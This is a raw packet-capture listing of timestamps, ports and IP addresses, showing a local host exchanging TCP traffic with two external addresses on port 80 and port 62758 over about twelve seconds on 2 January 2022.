Jan 2, 2022 02:28:03.093339920 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.093472958 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.093632936 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.093688965 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.093740940 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.093755960 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.093782902 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.093810081 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.093826056 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.093890905 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.093910933 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.093988895 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.094001055 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.094053030 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.094078064 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.094103098 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.094125986 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.094152927 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.094180107 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.094203949 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.094227076 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.094254017 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.094274998 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.094305038 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.094336987 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.094342947 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.094403028 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.094408035 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.094446898 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.094456911 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.094517946 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.094520092 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.094547033 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.094582081 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.094589949 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.094619036 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.094641924 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.094677925 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.094692945 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.094743967 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.094750881 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.094794989 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.094830036 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.094844103 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.094890118 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.094901085 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.094933033 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.094934940 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.094983101 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.094986916 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.095033884 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.095069885 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.095084906 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.095123053 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.095134974 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.095175028 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.095185995 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.095223904 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.095237017 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.095274925 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.095287085 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.095309973 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.095339060 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.095360041 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.095390081 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.095411062 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.095441103 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.095453978 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.095490932 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.095508099 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.095541954 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.095556974 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.095592022 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.095609903 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.095643997 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.095663071 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.095699072 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.095716000 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.095751047 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.095765114 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.095802069 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.095818043 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.095854044 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.095870018 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.095906973 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.095921040 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.095957994 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.095974922 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.096009016 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.096023083 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.096060038 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.096077919 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.096098900 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.096134901 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.096148014 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.096199036 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.096220970 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.096250057 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.096286058 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.096298933 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.096327066 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.096350908 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.096354961 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.096410036 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.096415043 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.096462965 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.096467018 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.096517086 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.096523046 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.096570015 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.096605062 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.096645117 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.096682072 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.096698046 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.096750975 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.096754074 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.096791983 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.096811056 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.096868992 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.097942114 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.098032951 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.098227024 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.098303080 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.098306894 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.098360062 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.098398924 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.098411083 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.098448992 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.098463058 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.098500013 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.098514080 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.098553896 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.098565102 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.098603964 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.098634958 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.098654032 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.098704100 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.098747015 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.098828077 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.098885059 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.098937035 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.098980904 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.098988056 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.099029064 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.099036932 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.099080086 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.099087954 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.099128008 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.099152088 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.099184990 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.099205017 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.099236012 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.099251986 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.099288940 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.099303007 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.099329948 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.099366903 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.099390984 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.099415064 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.099442959 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.099467039 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.099497080 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.099529028 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.099556923 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.099589109 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.099639893 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.099657059 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.099694967 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.099695921 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.099749088 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.099792957 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.099801064 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.099863052 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.099867105 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.099915028 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.099924088 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.099967003 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.099972963 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.100018024 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.100027084 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.100069046 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.100070953 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.100120068 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.100126028 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.100173950 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.100178957 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.100205898 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.100227118 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.100235939 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.100265026 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.100272894 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.100295067 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.100328922 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:03.100357056 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.100425959 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:03.618644953 CET	49836	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:03.783133984 CET	62758	49836	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:03.783233881 CET	49836	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:03.795140982 CET	49836	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:03.964238882 CET	62758	49836	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:04.011941910 CET	49836	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:04.176168919 CET	62758	49836	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:04.183470011 CET	49836	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:04.401369095 CET	62758	49836	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:04.401437044 CET	49836	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:04.584908962 CET	62758	49836	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:04.637038946 CET	49836	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:05.037923098 CET	49836	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:05.245887041 CET	62758	49836	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:05.588973999 CET	62758	49836	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:05.630525112 CET	49836	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:05.674869061 CET	49836	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:05.885755062 CET	62758	49836	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:12.943150043 CET	62758	49836	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:12.997096062 CET	49836	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:13.427705050 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:13.593127966 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:13.593597889 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:13.612294912 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:13.782111883 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:13.825325012 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:13.990748882 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:14.010637999 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:14.230803967 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:14.231415033 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:14.409790993 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:14.409854889 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:14.409893990 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:14.409933090 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:14.409970999 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:14.409996033 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:14.410010099 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:14.410032034 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:14.410052061 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:14.410090923 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:14.410129070 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:14.410144091 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:14.410151958 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:14.410167933 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:14.410195112 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:14.410326958 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:14.574948072 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:14.574999094 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:14.575037956 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:14.575077057 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:14.575117111 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:14.575187922 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:14.575227022 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:14.575265884 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:14.575304985 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:14.575340986 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:14.575376034 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:14.575380087 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:14.575397968 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:14.575418949 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:14.575460911 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:14.575476885 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:14.575480938 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:14.575500965 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:14.575537920 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:14.575577021 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:14.575614929 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:14.575653076 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:14.575668097 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:14.575673103 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:14.575691938 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:14.575731039 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:14.575759888 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:14.575834036 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:14.575839043 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:14.740396023 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:14.740457058 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:14.740498066 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:14.740539074 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:14.740556002 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:14.740576982 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:14.740597010 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:14.740618944 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:14.740658045 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:14.740700960 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:14.740741014 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:14.740746975 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:14.740765095 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:14.740780115 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:14.740818024 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:14.740878105 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:14.740886927 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:14.740928888 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:14.740966082 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:14.740982056 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:14.741004944 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:14.741014004 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:14.741044998 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:14.741084099 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:14.741100073 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:14.741126060 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:14.741175890 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:14.741178036 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:14.741219044 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:14.741259098 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:14.741291046 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:14.741296053 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:14.741336107 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:14.741350889 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:14.741374969 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:14.741413116 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:14.741426945 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:14.741451025 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:14.741489887 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:14.741528988 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:14.741529942 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:14.741569042 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:14.741605997 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:14.741619110 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:14.741646051 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:14.741662979 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:14.741688013 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:14.741725922 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:14.741754055 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:14.741765976 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:14.741806030 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:14.741831064 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:14.741844893 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:14.741884947 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:14.741920948 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:14.741935015 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:14.741961002 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:14.741961956 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:14.742001057 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:14.742027998 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:14.742073059 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:14.906627893 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:14.906687021 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:14.906733990 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:14.906752110 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:14.906773090 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:14.906814098 CET	62758	49837	207.32.218.236	192.168.2.6
